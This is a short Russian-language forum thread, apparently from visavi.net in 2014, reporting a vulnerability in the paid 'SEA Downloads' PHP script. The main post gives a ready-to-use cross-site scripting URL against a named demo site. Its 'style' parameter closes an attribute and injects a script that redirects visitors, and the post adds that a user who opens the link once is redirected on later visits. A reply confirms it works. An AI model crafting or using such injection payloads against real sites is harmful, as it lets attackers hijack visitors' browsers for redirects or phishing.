Уязвимость SEA Downoloads
1.
VITAMIN
(08.12.2014 / 14:28)
Собственно платный движек:
http://wapinet.ru/buy_php_scripts
Пример:
http://sea.wapinet.ru/
Уязвимость:
http://sea.wapinet.ru/?url=somebody.com&style=sea.wapinet.ru/style/style.css"><script>location.href="//visavi.net";</script>
Если хотя бы раз подключить юзера к этому линку,то при переходе на
http://sea.wapinet.ru
его будет бросать на
http://visavi.net
2.
Влад
(08.12.2014 / 15:00)
Точняк
URL:
https://visavi.net/topics/41673